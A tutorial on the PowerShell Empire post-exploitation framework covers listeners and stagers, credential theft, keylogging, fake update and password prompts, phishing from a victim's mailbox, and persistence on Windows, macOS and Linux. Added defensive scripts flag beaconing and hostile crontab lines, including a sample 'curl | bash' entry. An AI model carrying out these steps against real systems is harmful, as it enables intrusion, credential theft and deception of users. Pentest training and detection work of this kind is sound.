Ultimate guide to PowerShell Empire: from installation to persistence in the target system

Empire is a popular post-exploitation tool for Windows, Linux, and macOS. This article addresses all key aspects of this framework, including its most frequently used functions. Even if you are a seasoned pentester, you will likely find something new and useful in this material.

The original PowerShell Empire project is maintained no longer, but its fork by BC Security is actively developing.

warning

This article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this information.

Installation

If you use Kali Linux, you can install the framework in just one command:

sudo apt install powershell-empire

If you use another system, download the project files and install them manually.

git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh

That’s it: the Empire framework is installed on your PC.

Getting a foothold

Below are the basic terms frequently used in this article:

  • Listener is a local process that listens for a connection from the attacked remote host;
  • Stager is a piece of code that uploads the Agent (i.e. payload) to the attacked remote host;
  • Agent is a process running on the attacked remote host that connects to your Listener; and
  • Module is the code executed by the Agent to achieve certain goals.

Run the framework using the powershell-empire command. You will see a window resembling the one shown below.

Empire

To get a foothold, you have to perform the following operations: create a listener → create a stager for that listener → launch payload on a remote host (i.e. create an agent).

Listener

To create a listener, open the respective interface using the listeners command.

Listeners interface

There are no active listeners so far. Prior to creating a listener with the uselistener command, you can see what types of listeners are available in Empire.

uselistener <TAB>
List of available listeners in Empire

The above abbreviations refer to the following listener types:

  • dbx – a Dropbox listener (never reveals the attacker’s network to the victim but requires a token for the Dropbox API);
  • http – a standard HTTP/HTTPS listener;
  • http_com – an HTTP/HTTPS listener that uses a hidden IE COM object;
  • http_foreign – an HTTP/HTTPS listener used to inject Empire payloads;
  • http_hop – an HTTP/HTTPS listener that redirects commands to another listener to conceal the initial IP address (the RedirectListener parameter is required);
  • http_mapi – an HTTP/HTTPS listener that uses the Liniaal utility allowing you to gain control over the target host through an Exchange server;
  • meterpreter – an HTTP/HTTPS listener used to inject Meterpreter payloads;
  • onedrive – a OneDrive listener (you have to register an app at https://apps.dev.microsoft.com); and
  • redirector – a tool that redirects you from one agent to another one.

Now that you are familiar with the types of listeners, it is time to create one. To select the simplest (HTTP) listener type, enter the command:

uselistener http
Selecting listener type

Type info to view help for the selected listener.

Listener options

Proxy settings are a commonplace option nowadays; less obvious ones let you specify the date on which the listener is removed from the system and its hours of operation (if you use an HTTPS listener, you also have to specify the path to the certificate). Now it is time to set the listener name, the host address for the backconnect, and the port.

set Name l1
set Host http://192.168.6.1
set Port 4321
Setting listener’s parameters

To start the listener, type execute.

Starting the listener

Now you can see your listener in the listeners interface.

List of active listeners

Stager

Similar to the listener, select the stager type using the usestager command.

Types of stagers

Stagers can be either multiplatform or OS-specific (i.e. targeting only macOS or Windows). They are divided into the following types:

  • bash – an ordinary Bash script;
  • launcher – a one-liner written in a certain scripting language;
  • macro – a macro for office applications;
  • pyinstaller – an ELF file built using PyInstaller;
  • war – a set of bytes used to upgrade a stager;
  • applescript – an AppleScript file;
  • application – an Application file;
  • ducky – a Rubber Ducky script;
  • dylib – a macOS dynamic library;
  • jar – a payload in the JAR format;
  • machomacOS – an office macro for macOS;
  • pkg – a PKG installer that must be copied to the /Applications directory;
  • safari_launcher – an HTML script for Safari;
  • shellcode – a Windows shell;
  • teensy – a Teensy script;
  • backdoorLnkMacro – a .lnk file used to upload and launch an application;
  • bunny – a Bash bunny script;
  • csharp_exe – a PowerShell/C# application;
  • dll – a stager in the DLL format;
  • hta – an HTA stager for IE;
  • macroless_msword – a macroless document; and
  • wmic – an XSL stager for wmic.exe (not present in original Empire).

Select the stager type, for instance, a bat file for Windows.

Selecting stager type

Similar to the listeners, type info to view the available options.

Help for the selected stager

Empire allows you to set up a proxy server and has a built-in obfuscation function (unfortunately, it works only for PowerShell scripts). You can select where to save the resultant bat file and instruct the program to delete it after the execution. So, you specify the listener and path to the resultant bat file and then create a stager.

set Listener l1
set OutFile /home/ralf/tmp/l1.bat
execute
Creating a stager

The bat file containing the stager has been created and saved in the specified location.

Agent

You have to execute the bat file on the target host. You will see a connection notification.

Connection established and agent created

Go to the main menu and type the agents command to see all agents.

List of agents

For convenience purposes, you can rename your agent using the rename command and switch to the agent control interface using the interact command.

rename LVKP4HN3 al1
interact al1
List of agents

Now you are in the system, and it’s time to examine the most efficient and frequently used modules.

Windows exploitation and post-exploitation with Empire

Basic options

The basic options are functions implemented in Empire that don’t require third-party modules. The most frequently used ones are:

  • sysinfo (provides system information for a remote host);
  • download/upload (uploads files to a remote host and downloads files from it);
  • sleep (sets the check-in interval of the agent. For instance, with a 60-second interval, commands issued by the operator are placed in the agent’s queue, and the agent fetches the queue and returns the requested information once a minute);
  • steal_token (impersonates an access token);
  • shell [cmd] (executes a command via cmd.exe);
  • ps (displays the list of processes, including the process name, PID, the user in whose context the process is running, and the memory used by the process);
  • psinject (injects an agent into another process);
  • scriptimport (loads a PowerShell script into memory);
  • mimikatz (quickly and easily executes sekurlsa::logonpasswords);
  • creds (a local store of logon credentials, e.g. passwords and hashes, providing quick access to them). Hashes are added automatically when you use various modules, but you can also add and remove them manually. For instance, logon credentials collected using the above-mentioned mimikatz command look as shown below.
Creds local storage in Empire

Of course, this list does not include all the ‘quick commands’ in Empire, only the most frequently used ones.
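Defenders see the sleep interval from the other side: an agent that checks in every 60 seconds leaves an evenly spaced trail in web proxy logs, while interactive browsing does not. The following added example (not Empire code and not from the original article) groups constructed proxy log lines by source and destination and flags pairs whose inter-request gaps are nearly constant; the destination 192.168.6.1:4321 matches the listener configured above, and the request paths, client addresses and timestamps are constructed.

```python
"""Flag fixed-interval check-ins in HTTP proxy logs.

Added example, not part of the article or of Empire. An agent with a
60-second sleep produces one request per minute with almost no variance
in the gaps; a low coefficient of variation (stdev / mean) exposes it.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: "timestamp src dst path". The first client
# checks in once a minute; the second one browses a normal site.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 192.168.6.1:4321 /news.php
2024-03-01T10:01:00 10.0.0.5 192.168.6.1:4321 /admin/get.php
2024-03-01T10:02:01 10.0.0.5 192.168.6.1:4321 /news.php
2024-03-01T10:03:00 10.0.0.5 192.168.6.1:4321 /login/process.php
2024-03-01T10:04:00 10.0.0.5 192.168.6.1:4321 /news.php
2024-03-01T10:05:00 10.0.0.5 192.168.6.1:4321 /admin/get.php
2024-03-01T10:00:07 10.0.0.7 93.184.216.34:443 /index.html
2024-03-01T10:00:09 10.0.0.7 93.184.216.34:443 /style.css
2024-03-01T10:03:41 10.0.0.7 93.184.216.34:443 /about.html
2024-03-01T10:12:05 10.0.0.7 93.184.216.34:443 /contact.html
2024-03-01T10:12:06 10.0.0.7 93.184.216.34:443 /logo.png
2024-03-01T10:27:50 10.0.0.7 93.184.216.34:443 /index.html
"""


def parse_log(text):
    """Group request timestamps by (source, destination) pair."""
    pairs = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _path = line.split()
        pairs[(src, dst)].append(datetime.fromisoformat(ts))
    return pairs


def interval_stats(times):
    """Return (mean gap, coefficient of variation) of the gaps in seconds."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return 0.0, 0.0
    avg = mean(gaps)
    return avg, (pstdev(gaps) / avg if avg else 0.0)


def find_beacons(text, min_requests=5, max_cv=0.1):
    """Return {(src, dst): mean gap} for pairs with nearly constant gaps.

    max_cv is the tuning knob: a sleep with jitter widens the gap
    distribution, so a noisier environment needs a higher threshold.
    """
    hits = {}
    for pair, times in parse_log(text).items():
        if len(times) < min_requests:
            continue
        avg, cv = interval_stats(times)
        if cv <= max_cv:
            hits[pair] = avg
    return hits


if __name__ == "__main__":
    for (src, dst), avg in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: check-in roughly every {avg:.0f}s")
```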

To use additional modules, enter the usemodule command; if you need to find a module, use the searchmodule command.

Searching for dllhijack-related modules

Collection modules

Modules present in this section are frequently used in real-life situations. The following tools are used by pentesters to extract passwords and other data from browsers:

  • collection/ChromeDump;
  • collection/FoxDump;
  • collection/SharpChromium.

To launch a module, use the run or execute command. Empire will notify you that the selected module is not opsec safe and will ask whether you want to continue.

Running the SharpChromium module

The module retrieves for you all cookies, the history of requests, and saved account credentials.

History of requests and account credentials

The collection/file_finder module searches for specific files, while the collection/minidump module dumps the specified processes. To monitor information entered by the victim, you can launch a keylogger: collection/keylogger. For instance, if you open Notepad and enter the word test, Empire will record this as follows:

Keylogger output

The collection/clipboard_monitor module allows you to monitor the clipboard content.

Monitoring clipboard content

But the most exciting functions in this section are related to phishing. If you need a password but failed to authenticate at all the potential entry points, you can ‘ask’ the victim to provide the logon credentials to you using the collection/prompt or collection/toasted modules. For instance, collection/toasted works as follows: a notification that (seemingly) cannot be ignored appears on the victim’s screen (I use the requirement to restart). Regardless of the victim’s response, the authentication window pops up, and you get the logon credentials entered by the victim.

usemodule collection/toasted
set ToastTitle "Your session will be terminated"
set ToastMessage "The system will restart in 5 minutes. Do you want to postpone the restart?"
set Application "Windows Update"
set CredBoxTitle "Are you sure you want to restart your PC?"
set CredBoxMessage "You must authenticate to perform this action"
run
Restart notification
Authentication window
User login and password

Furthermore, the above modules have the VerifyCreds parameter; if it’s set to True, Empire will verify the authenticity of the retrieved account credentials prior to displaying them. If the victim enters incorrect information or makes a typing error, Empire will request credentials again.

Credentials modules

This section contains the PowerShell-based open-source Mimikatz utility embedded in Empire.

Mimikatz modules

The tool is easy-to-use and doesn’t require detailed explanations; so, let’s proceed to the next section.

Mimikatz hashdump

Management modules

This section includes a number of really cool features, including the possibility to enable and disable RDP for the victim using the management/enable_rdp and management/disable_rdp modules. Again, Empire will warn you that these modules are not opsec safe.

Enabling RDP
RDP enabled
Disabling RDP
RDP connection failed

Empire also includes a tool called EmailRaider; this utility uses the victim’s own Outlook client to read and send phishing emails on behalf of a certain user. The management/mailraider/ section contains plenty of powerful modules, but only one of them is frequently used in real life: management/mailraider/send_mail.

Parameters of the send_mail module

This module allows you to create malicious emails and send them out. Normally, victims gladly open emails received from their friends or colleagues, open attached files (even suspicious ones), and follow links in such emails.

The last module frequently used for monitoring is called management/vnc. It launches a VNC listener (I use Remmina) and establishes a reverse connection.

Launching VNC
Remmina

Privesc modules

The privilege escalation section is useful for quick security audits. In addition, its privesc/getsystem module lets you switch to the SYSTEM context. Empire includes two well-known scripts: privesc/sherlock (checks the attacked system for CVE vulnerabilities) and privesc/powerup/allchecks (identifies suitable privilege escalation techniques, e.g. substitution of a service binary).

Allchecks
Sherlock

Situational_awareness modules

Modules contained in this extremely useful section are normally used in the very beginning of exploitation. The two most important modules are situational_awareness/host/antivirusproduct and situational_awareness/host/applockerstatus. The first one provides information about antiviruses installed on the attacked host, while the second one collects information about AppLocker.

The situational_awareness/host/computerdetails module allows you to view events 4648 (RDP) and 4624 (successful logon) in the Windows Event Viewer, as well as AppLocker logs, executed PowerShell scripts, and saved RDP sessions.

Computerdetails

The situational_awareness/network/get_spn module scans SPNs across the network. In a similar way, situational_awareness/network/powerview/get_domain_trust and situational_awareness/network/powerview/map_domain_trust facilitate your search for trusts by recursively enumerating all domain trusts reachable from your current position in the network. In my personal opinion, the coolest module in this section is situational_awareness/network/bloodhound3.

Launching BloodHound in Empire
Downloading BloodHound output from a remote host

This tool allows you to download files generated by BloodHound from the attacked PC for subsequent analysis on your local PC.

Persistence modules

The key methods used to establish persistence in the target system are:

  • SID History (persistence/misc/add_sid_history);
  • SSP (persistence/misc/memssp); and
  • Skeleton Key (persistence/misc/skeleton_key).

If the user turns off or restarts the target computer, you can use these modules to log on and resume your Empire session. Empire also includes modules that ensure session persistence: persistence/elevated/registry and persistence/elevated/wmi. The only difference between them is that the first module uses the registry to establish persistence, while the second one uses WMI.

Persistence/elevated/registry

Empire executes the selected module and notifies you that persistence has been established. To check whether this is true, you can review the list of agents and then restart the system. After the restart, you will see a new agent on the list.

A new agent appeared on the list after the restart

Done with Windows; now let’s see how Empire can be used for exploitation of other systems.

macOS exploitation and post-exploitation with Empire

Basic modules of a macOS agent are similar to the basic modules of a Windows agent except for one detail: Python is used instead of PowerShell. Accordingly, the pythonscript module is used instead of scriptimport. The loadpymodule module can be used to load entire programs. The loaded file must be a ZIP archive containing Python scripts or packages, and the presence of an __init__.py file is mandatory.

The number of modules for macOS is significantly smaller than for Windows. For instance, collection/osx/browser_dump can extract the browsing history from the browser, but it won’t show you the cookies and passwords. Modules monitoring the user input operate differently from their Windows analogues; for instance, collection/osx/keylogger saves the history in a special file stored on the remote host, and you have to download this file from it. Another example: to monitor the clipboard using the collection/osx/clipboard module, you have to specify the duration of its operation in seconds.

Collection/osx/keylogger

But the phishing function for macOS (the collection/osx/prompt module) is implemented flawlessly.

Collection/osx/prompt

Empire allows you to launch App Store and request the user password (which, in most cases, is immediately provided).

Requesting user password
The keylogger module retrieves the password

Even though I have already configured the keylogger, the password is displayed in the Empire window immediately after the input. Overall, the exploitation algorithm for a Mac is simple and successful in 80% of cases:

  1. Phishing letter with a stager → you get an Empire agent;
  2. Using collection/osx/prompt → you get the password (in most cases, sudo);
  3. Using privesc/multi/sudo_spawn to get an agent in the sudo context; and
  4. Entrenching in the system with persistence/osx/loginhook.

According to a popular opinion, Macs are mostly used for data processing and preparation of reports. Therefore, the only possible reason to gain control over such a computer is to monitor its user. The above-described attack takes only 10-15 minutes. Even if the victim is reluctant to enter the password, at the third or fourth attempt, the attacked user will give up and do this.

After getting the sudo credentials, you can monitor all user activities using the management/osx/screen_sharing module that provides you with a VNC. As you can see, Mac computers can be hacked quickly and easily, and the main tool used by the attacker is phishing.

Linux exploitation and post-exploitation with Empire

Basic Empire modules for Linux don’t differ much from the macOS modules. For instance, collection/linux/keylogger uses a similar keylogging mechanism. But the Linux version includes an excellent module called privesc/linux/linux_priv_checker; it extracts information from the target system and helps to identify the privilege escalation vector. The module collects the following data:

  • basic system information;
  • running processes;
  • files that may be of interest to the attacker;
  • writable files;
  • logs that include the word “password”;
  • sudoers settings;
  • software version and related information contained in exploit-db; and
  • development tools available on the host.

To become a superuser, you must know the superuser password. The above-mentioned privesc/multi/sudo_spawn module is used to get it. The listener and sudo password must be specified as parameters.

usemodule privesc/multi/sudo_spawn
set Password user
set Listener l1
run
Using sudo_spawn to create a new agent in the sudo context

As a result, a new agent operating on behalf of root appears on the list of Empire agents.

List of agents

After gaining the superuser rights, you can launch two more Empire modules. The first one, collection/linux/mimipenguin, retrieves service passwords. Too bad, it’s not perfect, and sometimes other tools are required as well. The second module, persistence/multi/crontab, establishes persistence via crontab.

Crontab parameters

The crontab module requires you to specify the name of a file to be executed at certain intervals of time. The easiest way to maintain persistence is to load the same Empire stager.
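The defender’s counterpart to crontab persistence is to review cron entries for commands that fetch, decode or pipe code into an interpreter at run time, or that run a hidden file from a temporary directory on a tight schedule. The added example below (not part of the article or of Empire) parses a constructed crontab and reports such entries; the sample lines and the heuristics are constructed for illustration, and the 192.168.6.1:4321 address in one of them is the listener from this article.

```python
"""Review crontab entries for run-time code loading.

Added example, not part of the article or of Empire. The sample crontab
and the patterns are constructed; tune the patterns to your environment.
"""
import re

# Constructed sample crontab: two routine jobs and three persistence-style
# entries (inline interpreter with base64, hidden file in /tmp, curl|bash).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * echo "import base64;exec(base64.b64decode('QUJD'))" | python3 &
@reboot /tmp/.l1.sh
30 6 * * 1 /opt/backup/run.sh >> /var/log/backup.log 2>&1
* * * * * curl -s http://192.168.6.1:4321/news.php | bash
"""

# (reason, pattern) pairs matched against the command part of each entry.
SUSPICIOUS = [
    ("downloader", re.compile(r"\b(curl|wget)\b")),
    ("pipe to interpreter",
     re.compile(r"\|\s*(sh|bash|dash|zsh|python[0-9.]*|perl|ruby)\b")),
    ("base64 decode", re.compile(r"base64(\.b64decode|\s+(-d|--decode))")),
    ("temp or hidden path",
     re.compile(r"(^|[\s'\"=])/(tmp|var/tmp|dev/shm)/|/\.[^/\s]+")),
]


def split_entry(line):
    """Return (schedule_fields, command), or None for comments/blank/vars."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        parts = line.split(None, 1)
        command = parts[1] if len(parts) > 1 else ""
        return [parts[0]], command
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return parts[:5], parts[5]


def frequent(schedule):
    """True for @reboot or a minute field firing at most every 5 minutes."""
    first = schedule[0]
    if first in ("@reboot", "*"):
        return True
    m = re.fullmatch(r"\*/(\d+)", first)
    return bool(m) and int(m.group(1)) <= 5


def review_crontab(text):
    """Return [{'line', 'command', 'reasons'}] for entries worth a look."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = [name for name, rx in SUSPICIOUS if rx.search(command)]
        if frequent(schedule):
            reasons.append("boot-time or high-frequency schedule")
        if reasons:
            findings.append({"line": n, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['reasons'])}: {f['command']}")
```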

Conclusions

In the end, I would like to note automated scenarios for Empire that enable you to collect information and advance through the network. For instance, DeathStar automates frequently used attack scenarios targeting Windows-based systems (see the article Lateral movement in Active Directory. Offensive techniques used to attack the domain).


For those interested in this topic, I created @RalfHackerChannel on Telegram where you can ask any questions (or answer questions of other users). See you there!
